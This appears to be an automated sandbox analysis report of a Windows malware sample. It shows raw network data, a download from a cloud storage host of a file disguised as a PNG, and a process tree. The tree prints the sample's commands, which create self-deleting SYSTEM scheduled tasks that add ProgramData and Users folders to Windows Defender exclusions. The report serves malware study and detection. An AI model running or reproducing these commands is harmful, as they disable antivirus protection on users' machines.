                                                                                2025-01-10 01:29:37 UTC4096INData Raw: c1 4d 2c 3d ba 62 d6 96 71 ca d6 4b b5 58 cd 4a a4 11 4c a3 d0 89 6c 6b fc ee fc 4b 4d 35 c9 f7 95 4b 97 32 7e 44 2b 37 11 03 9b 99 91 5a f7 14 37 7b 37 cc 65 b7 a9 cf 8d f4 eb 41 46 51 24 fd 25 af fc 86 9c 1f c4 1a 54 8b 3b fb 7d 39 ec 48 e5 7f 21 a6 b6 db 76 55 bb 27 ea bc ab 6d 7a 28 4e ff 3f 9c a2 57 83 f5 fd 76 19 12 05 9b f5 d8 a8 07 9e 81 f9 12 bb 26 4a 6b ed d6 ac b7 f9 f9 e4 d0 bf 0b 9a 3f 49 46 40 63 f3 00 f8 8d e9 26 e6 fd 66 ea 99 8d bf e6 ed 98 de 15 fc 0a fa 0b ba 75 2e 1f a1 7f 27 dc bd a7 76 d8 98 91 91 79 63 58 d1 8a f8 f9 31 88 66 9b 7d 56 b3 ba 0e b5 ec 4a 54 b6 1e ff 15 5d 67 86 04 28 61 c5 76 22 30 7b 50 f4 8a 66 f7 1c 9a 39 a1 f9 22 90 d9 41 48 93 50 e7 2a 69 dc a7 cf e6 d3 6e 03 c6 19 7a c8 94 1a 5f 0e 7e ab c3 e2 8d 2e f0 f1 71 ae
                                                                                Data Ascii: M,=bqKXJLlkKM5K2~D+7Z7{7eAFQ$%T;}9H!vU'mz(N?Wv&Jk?IF@c&fu.'vycX1f}VJT]g(av"0{Pf9"AHP*inz_~.q
                                                                                2025-01-10 01:29:37 UTC4096INData Raw: 30 dc a8 86 8a 8d 57 75 88 45 99 d1 d6 cd 5e 4f 69 9a 0c 36 e9 b7 8c 7b 13 db f4 19 d3 01 f2 a0 48 d8 4a 89 2f 3d a8 74 d7 e8 bc 4e 70 18 9d 28 6f 98 b4 c2 9a 58 6d df dd 5a d6 24 eb bc eb 24 be b7 e7 d2 02 13 9f f6 92 b6 01 be 9c fc 5c fc bb e9 61 c9 a8 ce a6 f9 f3 10 cb 92 1b 91 59 ca 67 33 c9 33 97 8e ef 02 17 58 4b 63 e1 25 4d 3e e6 ca 69 0e f6 16 c5 bd d6 00 23 58 d8 ac a5 f3 37 34 59 c0 26 a9 c8 ca 47 33 aa 21 12 8e a1 b1 b4 45 97 58 5e 6f 86 95 92 32 de 10 ca 80 4e f0 3d 38 e8 2d 31 d9 4c 0d b0 ea 9d fa 03 af da e5 ce 06 fc 7f 93 1d e9 86 84 10 f1 fb ce 8e fc 26 c1 f6 91 f9 f1 c1 d7 80 5e 3b af 0c f1 52 ec 21 96 8e 81 7e ac 0d f8 ec cb 67 6c 10 b0 83 83 0a 12 b5 22 d5 b5 b0 18 73 d5 76 a3 88 37 35 b4 11 43 0b 74 ea 9e 40 2e 90 e2 29 c1 e9 02 56 dc
                                                                                Data Ascii: 0WuE^Oi6{HJ/=tNp(oXmZ$$\aYg33XKc%M>i#X74Y&G3!EX^o2N=8-1L&^;R!~gl"sv75Ct@.)V


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.2.560502118.178.60.1034431220C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:29:39 UTC127OUTGET /dsb-hr1.png HTTP/1.1
                                                                                User-Agent: Chrome/114.0.0.0
                                                                                Host: upitem.oss-cn-hangzhou.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:29:40 UTC546INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:29:39 GMT
                                                                                Content-Type: image/png
                                                                                Content-Length: 486896
                                                                                Connection: close
                                                                                x-oss-request-id: 67807803482D3730352E105B
                                                                                Accept-Ranges: bytes
                                                                                ETag: "8FB4D4B3DCE57A2C6F9FF2278B5BAE86"
                                                                                Last-Modified: Fri, 22 Mar 2024 09:16:17 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 13263015917138006152
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000105
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: j7TUs9zleixvn/Ini1uuhg==
                                                                                x-oss-server-time: 9
                                                                                2025-01-10 01:29:40 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 54 00 00 02 c0 08 06 00 00 00 76 4e 6b 38 00 00 20 00 49 44 41 54 78 9c 9c fd 0b 96 ec ba 0a 2d 0a 8a bc bd a8 46 57 7b aa 2d af 2f 37 e5 a2 42 4a a8 8d 40 ac 73 c6 f9 29 ae 1a 96 f0 c7 c3 4b 00 ce 4e 63 cc f6 6a d8 91 e4 21 90 5c d8 a0 3a 98 21 dc 45 1c 05 ce 4e 7f 01 81 b6 26 e5 3e 00 b5 4d 6e 2a 70 93 f3 af ee 38 75 a1 c9 a0 9e 58 52 06 4c 39 83 94 75 65 f9 b9 74 78 66 41 24 b6 8c fe 7b 34 ca d8 46 76 c3 6a 19 be ba ba d0 ab a1 02 9c 6e cb 3b a5 1f 22 5f be 2c 1f 46 79 be 1d 31 c0 b4 f9 aa b2 c6 86 a2 a8 cf cb c7 70 77 57 fe fc f3 87 68 e8 e2 0b 6f cd 35 43 90 53 59 13 af fa 20 de 75 cf 38 f0 0a 60 ae 4e e6 3d 38 df 24 af 1e a0 e9 cb 6d 8f 0e 2b 74 0c e7 47 02 44 b6 86 1d e1 88 e3 39 f4 b1 3f 14
                                                                                Data Ascii: PNGIHDRTvNk8 IDATx-FW{-/7BJ@s)KNcj!\:!EN&>Mn*p8uXRL9uetxfA${4Fvjn;"_,Fy1pwWho5CSY u8`N=8$m+tGD9?
                                                                                2025-01-10 01:29:40 UTC4096INData Raw: 12 b9 9e 1d 9a 7a 6b b1 80 2c d3 33 f3 ba d8 49 35 5f c0 e8 c1 62 ac 3f 5d 35 fd 81 a2 46 4a 0d 87 5a bb 96 93 58 b3 58 26 41 7a 31 5b cb b1 5d e2 77 41 fd a6 4d 43 ed 45 d8 5f 4d cd 42 68 56 f8 b9 06 ae ab e2 75 08 f0 40 35 77 d6 99 c2 30 b9 1e 71 e6 53 ee 08 06 50 41 34 32 04 72 01 92 fe c2 d7 d7 30 f9 aa 57 1d aa ca a8 5b 4b fb c9 1d 1f b6 e6 bf 24 74 6e b2 e3 12 73 ce 30 10 39 56 e8 ad 4c ee ad 21 38 ad 0a ff e2 98 23 e4 28 f7 11 5a b5 40 6e a0 0b 9a 1f a3 e6 44 ac 1e 57 02 b7 d7 40 1a 9b ec 2c 2b c7 65 e5 a6 b9 3e 4c b6 b6 cc 9d 74 d7 21 7e e5 30 aa b6 00 2f e5 49 66 71 f8 9f 70 c1 a0 f5 02 e2 56 d3 7c c3 29 7f 37 0c f8 84 e5 ae e4 d9 30 ca dd 0c 8e f2 de 9b 62 db c3 a1 20 e7 55 a9 fb ff a0 f8 5b de fe b4 8e d2 5c 24 e1 d0 cb 29 58 a5 cc f7 3a 36 4d
                                                                                Data Ascii: zk,3I5_b?]5FJZXX&Az1[]wAMCE_MBhVu@5w0qSPA42r0W[K$tns09VL!8#(Z@nDW@,+e>Lt!~0/IfqpV|)70b U[\$)X:6M
                                                                                2025-01-10 01:29:40 UTC4096INData Raw: 67 41 fb 24 00 63 de bb bf 78 39 cb 89 d8 d1 c1 43 39 06 08 31 a5 c9 37 d5 60 29 c0 21 60 52 33 02 eb 3b 83 7c 9b db 93 c7 aa 75 44 f4 5d cb 29 c1 a2 ec ed a5 37 96 0c e7 d8 09 20 11 39 fa 3e 51 69 d9 d3 87 68 11 2e 42 a4 ee 48 18 b2 cc bd 88 e3 09 8a 0e 42 11 44 75 3b 07 48 f7 44 f4 65 d7 0c 99 ab 18 22 a6 af 3e d7 2e 78 c7 d4 fd 85 d4 b6 36 60 48 24 17 04 7d 04 30 ad d9 a2 22 d6 95 cd 12 79 1b 99 68 3d 05 9b 61 53 bd 57 16 9c 1b b4 2f a1 d2 2a 30 b8 66 e2 43 54 2e 50 45 54 2d b7 df 1c 72 6d 57 79 64 5a 8f 7c 2a 53 71 fa 52 54 f2 c0 5a c2 a9 03 c1 87 72 a8 19 59 74 20 19 ac 16 aa e9 0f 3a 4a 3b 06 d9 0d eb cb 6f 88 f9 76 06 58 61 96 6f 04 0c 5d e3 b1 68 78 0d a8 2e 24 5a 1e 5d b1 41 8f f1 d4 8c b5 ed ba a9 b7 e4 3a 80 80 75 04 7b 2f 4a fe c6 b4 90 f4 82
                                                                                Data Ascii: gA$cx9C917`)!`R3;|uD])7 9>Qih.BHBDu;HDe">.x6`H$}0"yh=aSW/*0fCT.PET-rmWydZ|*SqRTZrYt :J;ovXao]hx.$Z]A:u{/J
                                                                                2025-01-10 01:29:40 UTC4096INData Raw: 0c 86 5e b7 a1 b6 ba 21 5f 01 98 e3 94 c6 39 26 87 95 b1 4a 82 31 c8 73 3e 23 d2 7c ff 19 9b 4e c9 aa ce c2 ad 50 48 7a 9f c2 20 d3 97 11 65 74 6f 4f fe 82 4e 60 e4 bb 87 bf 85 b5 5d 76 1a c8 08 64 75 59 71 2f 7d ce ae 7c 8c 63 2f dc f5 c7 25 9b b9 3a 62 4f 56 eb 6b 74 e9 c8 e3 16 75 63 34 fc 42 43 be e4 b7 28 07 6a 98 d1 f9 a2 84 fa 41 8f 82 20 18 60 da 35 92 4c 09 89 bf aa e3 d2 c3 b3 a3 95 ae 6f 10 ec bb d8 b9 49 21 cb bb dc 8a e3 25 4b 61 df d2 96 74 32 fa 6d 22 b2 b3 72 9f 07 34 f3 b9 ad dd ea e6 5b c8 a1 85 8e 81 d1 6c 06 ac d5 ce 45 b6 c9 34 6b 85 f4 79 ef 3a b9 c7 f6 38 14 a0 ee f6 06 72 2c 1a 3f d4 58 9e 7c 3d 75 17 e0 1f 57 36 32 d4 41 63 02 a4 cb 2d 01 a8 21 0d 73 0e bf 38 55 62 66 6b 65 55 c4 4a bc 85 ce f8 30 6e 7b 69 35 1d 34 a2 34 80 a8 79
                                                                                Data Ascii: ^!_9&J1s>#|NPHz etoON`]vduYq/}|c/%:bOVktuc4BC(jA `5LoI!%Kat2m"r4[lE4ky:8r,?X|=uW62Ac-!s8UbfkeUJ0n{i544y
                                                                                2025-01-10 01:29:40 UTC4096INData Raw: b3 17 c8 fb d9 ba 4a 52 9e 19 b6 f2 0c 90 58 f1 c8 82 42 70 91 be fa f9 1e 87 5c 32 5c d9 be eb 70 9d dd 9a a0 fe ba 58 2b 40 8b 87 2f d8 1f 1f 28 3d 5e ce 63 c4 99 3e f8 e3 ad bc 24 77 b7 f7 48 3b 25 73 ae 0f 24 0b ec a3 75 ef ee 53 62 50 5d df 8c b2 3c 14 e6 c8 14 a7 cf c5 e9 4a db 4d d8 2e d8 26 7e 7f 62 aa 90 f6 73 09 0b 2b 06 cd dc ed a9 73 da 0f 11 49 ee 05 1b fb 5f ed 81 8b 07 7a a4 c1 96 fd ee aa 2c b9 6b f2 7e 05 90 09 d1 88 e1 03 55 dd 4c 27 e4 66 e2 c7 9e 4c 95 b9 2e 27 61 ea b1 1b 73 e9 b8 7f 48 f0 ef 88 75 c0 88 d3 ac 39 18 3a 88 23 ea 9b 8c bf f6 15 a3 0c 02 7d b8 b9 d2 bf f7 bb 9d f7 3a 5e ad c8 7f df 59 59 50 45 35 58 55 1a 34 e2 e4 c9 ce 79 ca aa d9 a2 c8 60 37 b5 a1 95 e9 0e ed cf 54 90 0d 93 62 94 c9 9c 68 c6 a4 6e d2 84 c9 ce 27 c8 d1
                                                                                Data Ascii: JRXBp\2\pX+@/(=^c>$wH;%s$uSbP]<JM.&~bs+sI_z,k~UL'fL.'asHu9:#}:^YYPE5XU4y`7Tbhn'
                                                                                2025-01-10 01:29:40 UTC4096INData Raw: f9 fe d5 7c f4 d3 f1 f3 0a 69 56 c3 f3 77 ac 5b 22 06 46 d8 2a 8b 44 de df 0c bd f8 67 3d ce c6 b2 ba 98 93 9c 1b e3 a6 69 8a f4 10 3c f2 05 cc 33 b0 82 5e b5 e8 9d 69 38 9c 6d 7c 5d 5c e0 d7 6c b5 18 cc 07 12 fb 6d ad 33 b7 ce 56 6e fb 27 9b 4d 3b 1d 1b a6 0b 40 31 dd 1a 92 14 ae 0d 0e 8a 3d db 9e bd ed 8e 11 42 5d cc 85 c4 54 1c 95 f9 57 95 67 32 a1 25 17 66 cf 4b 55 4f 97 79 32 14 bb 22 89 9b 26 fd 5c 2d 05 9d 33 63 4b ad 61 8c 1b 00 4a ab 92 f9 63 37 47 2c 9e e1 0a 8d 10 9b 75 58 81 25 cc 71 4d 08 5a da da ea 7c 1a 00 d0 4e e7 85 84 8b 5d 48 5a 0a ca b9 30 06 19 e4 22 2e 6b 04 99 ce cb f7 89 cb f6 13 c1 94 b5 05 4a 85 c0 9b d3 21 7e 4f ea fa 6a ae d0 4c c1 8c 86 6c a0 98 cd b2 42 88 96 d4 a0 1e 7c 01 66 f1 e7 5c d8 13 28 d0 6f ae 96 fa 4c b4 3f 75 a7
                                                                                Data Ascii: |iVw["F*Dg=i<3^i8m|]\lm3Vn'M;@1=B]TWg2%fKUOy2"&\-3cKaJc7G,uX%qMZ|N]HZ0".kJ!~OjLlB|f\(oL?u
                                                                                2025-01-10 01:29:40 UTC4096INData Raw: dc c5 62 f2 8c aa 9a 4f ce 3e 97 37 8a ad 9f 49 02 38 d0 3a 49 72 ce 5d e2 69 2a db 55 1b f0 0b c5 ef 3a dc bf 14 5a 9e a7 ca 27 77 3c 23 8e 6e bb 98 c1 da 01 97 f6 74 b5 4f f1 3a 81 f2 e6 a5 9d c6 76 c3 97 80 be 85 db 96 86 0c 7c 6c 07 e1 1a ed 98 2f bd b6 29 a0 f2 ff 4a c3 da 8f 55 54 b7 4b 51 17 7f 33 56 a8 df 0d ee 04 6a b3 2b 29 f0 93 a2 30 5c 2e 53 cc 6b 67 65 bc 9c 12 44 ae 75 e7 80 fe 45 b0 87 7b e5 16 f5 25 aa d4 ba 9f 18 aa 91 cd 57 93 11 ab 3d 75 22 fd c8 08 af 2e b7 fe 7e 7d d6 be 04 c4 cd d5 bd 37 9d 92 f0 bb a7 1f 9a 07 20 ee 36 3e 5c 26 03 e7 b8 03 fa 48 8f 61 16 08 a4 c7 6e 63 37 04 25 80 a8 52 06 b7 bb 1a d9 c2 f4 03 f4 b3 f7 f4 b7 2c 3e 22 6d 3b 5a 26 34 93 6a 6a 8c 33 8e f8 a5 7f 40 d9 25 aa aa 93 35 2f d0 c3 53 48 30 0e 58 fe c7 84 73
                                                                                Data Ascii: bO>7I8:Ir]i*U:Z'w<#ntO:v|l/)JUTKQ3Vj+)0\.SkgeDuE{%W=u".~}7 6>\&Hanc7%R,>"m;Z&4jj3@%5/SH0Xs
                                                                                2025-01-10 01:29:40 UTC4096INData Raw: c0 70 9d c1 0b f2 f3 a3 ba 3e 88 f1 4d 79 2f 5c c2 1b 26 87 6b 27 35 06 0f b1 e3 60 65 26 77 4d 82 24 e7 b4 0e 9e 25 6c 3d a5 29 a6 61 a7 ad 33 62 d3 73 41 dd 47 1d fb d6 16 b5 2f 32 38 72 12 82 aa 75 51 f2 48 82 31 65 f5 7f 7f 01 b0 2b 42 11 c2 d5 8d 71 89 5b b5 12 ea 71 33 8c d4 a5 36 69 b0 e4 86 2d 07 1e 9b c1 06 80 e9 05 b2 5a 9b e9 46 d8 dd ca f7 c2 7c 3c 7b dd 42 c5 2f 8b f2 7c 5b a1 7a 9d d6 6e c7 12 18 98 fd 68 32 99 c9 55 2a 32 1a 6b 8b e3 e1 33 ef 6f 1c 29 e4 a0 6b 18 39 6a e8 35 9f 8a ac ea 9b 6b 01 5d 4f df fa 7a 3c 39 ae bf 1d 70 b1 c0 f6 8f 62 6d 1a 35 41 7e 96 e0 ea bf 46 72 c7 67 42 99 78 0d 52 50 22 50 d0 23 de 89 41 26 f5 42 f2 74 f8 3d 24 c5 6f d2 33 c1 92 9d a3 bb 99 72 8f 27 63 90 9d ec 7f da 8e 79 18 f2 50 f3 52 b2 42 f4 e0 d0 49 61
                                                                                Data Ascii: p>My/\&k'5`e&wM$%l=)a3bsAG/28ruQH1e+Bq[q36i-ZF|<{B/|[znh2U*2k3o)k9j5k]Oz<9pbm5A~FrgBxRP"P#A&Bt=$o3r'cyPRBIa
                                                                                2025-01-10 01:29:40 UTC4096INData Raw: 69 26 08 4c 56 a1 2a 49 a9 0b 80 33 53 6f 04 93 b2 75 9d 8a 06 a6 31 4e 22 6a 16 5d 00 d5 36 f8 ac 33 53 50 19 c2 95 81 37 b4 47 a5 a7 f2 ee 2b 1b ca db 4d 59 b8 7c dc 3a 67 c2 63 95 a0 57 01 d3 6a 05 01 15 1f 7f df aa 51 23 11 80 33 00 e5 5d e6 19 c2 8c b6 6b b7 f7 df 59 f2 8c f9 41 24 69 2f ff b3 fd 50 e5 36 d0 ce a7 e2 7d 58 2d 20 b7 a7 9f 9b 94 cd 0e c2 e5 39 ed bc d2 19 1d 15 59 ea 59 42 1a 68 14 50 7d cf 60 91 a9 0d 47 a6 f4 3c 4d 55 f3 2a 7f a8 4f 4e 88 e1 77 cf da 0b c5 73 ae b9 8d f0 45 74 07 59 83 6b 86 5f 9f 3a 76 ec 19 7c 5a 34 cd ae 78 d5 9d fc a6 3b b4 13 5b 1d 84 b2 66 50 02 26 ee dd 1a 42 91 e1 87 36 5d a7 54 a2 39 1b 3d ec ac 80 5a 1c dc 54 aa 13 6f 42 fc 33 94 74 ae 9f 8f 8e 27 68 f9 4c c8 19 d1 54 f2 15 1e 82 8a c7 2f e6 1d 6d 97 22 f8
                                                                                Data Ascii: i&LV*I3Sou1N"j]63SP7G+MY|:gcWjQ#3]kYA$i/P6}X- 9YYBhP}`G<MU*ONwsEtYk_:v|Z4x;[fP&B6]T9=ZToB3t'hLT/m"
                                                                                2025-01-10 01:29:40 UTC4096INData Raw: 21 50 b7 0e f4 7b 90 de e6 eb d2 21 e8 ae ef b4 0a d8 71 9e 2a 44 fe 1f 3e 71 4d 39 6b 07 91 2d 30 2d 48 27 b6 31 53 5f 58 c2 6e 93 cb ac 81 11 b1 be e8 83 eb 7a 5f 6a 4b 95 34 3d 79 ea 11 c8 89 e1 35 52 73 85 00 70 cb 4c 78 e6 0c 48 26 e0 86 3e 38 0b c6 59 3b e8 61 b7 3b 0c 8b 5c 2d 01 24 8d 26 28 5f 95 d3 91 74 82 da d6 de 87 c2 7e 17 54 71 bc 82 6d d4 28 9a 27 fc 0c bf a8 19 d3 1a 05 a9 3b dc e8 68 c8 b5 38 e1 b9 1a 8d 6d 38 cd 1d 16 d6 b9 89 f0 7b 53 bb 0c 90 b6 f5 a1 14 2b 45 e3 ed 43 8e 61 51 1e 84 55 27 0d 0d e7 26 59 01 77 2c b7 63 00 f7 1c 42 4c 15 44 79 4a c9 94 ea 4a 4e 13 df 27 43 80 e6 8e 4f 91 f9 48 ec 77 81 e0 f8 15 b3 10 31 14 da 87 fb 99 6b 6d c9 7e d6 89 d7 99 79 b5 ec d6 15 76 df 19 04 80 61 c3 54 5d 80 0e 5d ed 9a a7 39 83 ae 15 43 87
                                                                                Data Ascii: !P{!q*D>qM9k-0-H'1S_Xnz_jK4=y5RspLxH&>8Y;a;\-$&(_t~Tqm(';h8m8{S+ECaQU'&Yw,cBLDyJJN'COHw1km~yvaT]]9C


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:20:26:05
                                                                                Start date:09/01/2025
                                                                                Path:C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\2873466535874-68348745.02.exe"
                                                                                Imagebase:0x140000000
                                                                                File size:30'940'160 bytes
                                                                                MD5 hash:988A0F183ED996DBFCBF7A7A9FEBD75B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:3
                                                                                Start time:20:26:35
                                                                                Start date:09/01/2025
                                                                                Path:C:\Users\user\Documents\9afrYB.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\user\Documents\9afrYB.exe
                                                                                Imagebase:0x140000000
                                                                                File size:133'136 bytes
                                                                                MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Antivirus matches:
                                                                                • Detection: 0%, ReversingLabs
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:4
                                                                                Start time:20:26:36
                                                                                Start date:09/01/2025
                                                                                Path:C:\Users\user\Documents\9afrYB.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\user\Documents\9afrYB.exe
                                                                                Imagebase:0x140000000
                                                                                File size:133'136 bytes
                                                                                MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:6
                                                                                Start time:20:27:01
                                                                                Start date:09/01/2025
                                                                                Path:C:\Users\user\Documents\9afrYB.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\user\Documents\9afrYB.exe
                                                                                Imagebase:0x140000000
                                                                                File size:133'136 bytes
                                                                                MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:7
                                                                                Start time:20:27:12
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                Imagebase:0x7ff6a92c0000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:8
                                                                                Start time:20:27:12
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:9
                                                                                Start time:20:27:12
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                                                Imagebase:0x7ff647250000
                                                                                File size:235'008 bytes
                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:10
                                                                                Start time:20:27:12
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:SCHTASKS /Run /TN "Task1"
                                                                                Imagebase:0x7ff647250000
                                                                                File size:235'008 bytes
                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:11
                                                                                Start time:20:27:12
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff6a92c0000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:12
                                                                                Start time:20:27:12
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                Imagebase:0x7ff647250000
                                                                                File size:235'008 bytes
                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:13
                                                                                Start time:20:27:12
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:14
                                                                                Start time:20:27:12
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff75d280000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:15
                                                                                Start time:20:27:13
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                Imagebase:0x7ff6a92c0000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:16
                                                                                Start time:20:27:13
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:17
                                                                                Start time:20:27:13
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                                                Imagebase:0x7ff647250000
                                                                                File size:235'008 bytes
                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:18
                                                                                Start time:20:27:13
                                                                                Start date:09/01/2025
                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:SCHTASKS /Run /TN "Task1"
                                                                                Imagebase:0x7ff647250000
                                                                                File size:235'008 bytes
                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                Has elevated privileges:true
